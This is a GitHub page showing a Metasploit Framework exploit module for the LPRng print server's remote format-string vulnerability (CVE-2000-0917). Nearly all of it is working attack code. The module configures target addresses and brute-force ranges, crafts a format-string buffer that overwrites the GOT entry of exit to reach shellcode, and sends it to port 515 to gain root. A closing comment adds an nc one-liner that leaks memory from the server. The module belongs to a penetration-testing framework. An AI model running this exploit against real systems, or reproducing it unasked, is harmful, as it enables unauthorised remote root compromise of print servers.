FilesExpand file tree

 master

/

16842.rb

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

193 lines (160 loc) · 5.06 KB

 master

/

16842.rb

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

193 lines (160 loc) · 5.06 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

##

# $Id: lprng_format_string.rb 9666 2010-07-03 01:09:32Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::Tcp

include Msf::Exploit::Brute

include Msf::Exploit::FormatString

def initialize(info = {})

super(update_info(info,

'Name' => 'LPRng use_syslog Remote Format String Vulnerability',

'Description' => %q{

This module exploits a format string vulnerability in the LPRng print server.

This vulnerability was discovered by Chris Evans. There was a publicly

circulating worm targeting this vulnerability, which prompted RedHat to pull

their 7.0 release. They consequently re-released it as "7.0-respin".

},

'Author' => [ 'jduck' ],

'License' => MSF_LICENSE,

'Version' => '$Revision: 9666 $',

'References' =>

[

[ 'CVE', '2000-0917' ],

[ 'OSVDB', '421' ],

[ 'BID', '1712' ],

[ 'US-CERT-VU', '382365' ],

[ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],

[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],

[ 'URL', 'http://www.exploit-db.com/exploits/226' ],

[ 'URL', 'http://www.exploit-db.com/exploits/227' ],

[ 'URL', 'http://www.exploit-db.com/exploits/230' ]

],

'Platform' => 'linux',

'Arch' => ARCH_X86,

'Privileged' => true, # root

'DefaultOptions' =>

{

'PrependSetresuid' => true

},

'Payload' =>

{

'Space' => 130, # buffer size on caldera is 180! (need ~50 for fmt)

'BadChars' => "\x00\x0a\x20\x25",

},

'Targets' =>

[

# tested OK - jjd

[ 'Caldera OpenLinux 2.3 Bruteforce',

{

'Platform' => 'linux',

'NumPops' => 243,

'FlowHook' => 0x80992d4, # GOT of exit

# (0x809c180+(41+4+10+48)) - data segment, but gets corrupted

'Bruteforce' =>

{

'Start' => { 'Ret' => 0xcffffff4 },

'Stop' => { 'Ret' => 0x7fffe004 },

'Step' => 16

}

}

],

=begin

# untested (from public exploits)

[ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',

{

'NumPops' => 299,

'Ret' => 0xbffff640,

'FlowHook' => 0xbfffee30

}

],

[ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',

{

'NumPops' => 304,

'Ret' => 0xbffff920,

'FlowHook' => 0xbffff0f0

}

],

[ 'RedHat 7.0 - Guinesss',

{

'NumPops' => 300,

'Ret' => 0x41424344,

'FlowHook' => 0xbffff3ec

}

],

[ 'RedHat 7.0 - Guinesss-dev',

{

'NumPops' => 300,

'Ret' => 0x41424344,

'FlowHook' => 0xbffff12c

}

],

=end

# ...

[ 'Debug',

{

'NumPops' => 1, # sure to miss.

'Ret' => 0x41424344,

'FlowHook' => 0x45464748

}

]

],

# 'DefaultTarget' => 0,

'DisclosureDate' => 'Sep 25 2000'))

register_options( [ Opt::RPORT(515) ], self.class )

end

def exploit

# we want to use DPA for this one :)

fmtstr_set_caps(false, true)

# check syslog to see which number hits 41414141

=begin

400.times { |x|

connect

buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]

sock.put(buf)

#handler

disconnect

}

=end

print_status("Trying target #{target.name} ..")

super

end

def brute_exploit(addrs)

#print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])

printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...

num_start = printed.length + 2 + 4

# write 'ret' addr to flowhook (execute shellcode)

# NOTE: the resulting two writes must be done at the same time

# characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)

fmtbuf = "_" * 4

fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])

#print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")

# append payload and newline

#fmtbuf << payload.encoded

fmtbuf << "\x90" * 32

fmtbuf << Rex::Text.charset_exclude(payload_badchars)

fmtbuf << "\n"

print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])

connect

#print_status("Sleeping, attach now!!")

#select(nil,nil,nil,5)

sock.put(fmtbuf)

handler

disconnect

end

end

=begin

HRM!

The following causes info leakage!

bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC

There are various other ways to trigger the vulnerability. LPD uses the single-byte commands

0x01 -> 0x09...

It's unclear if there is a way to auto-detect the lpd version via LPD commands.

=end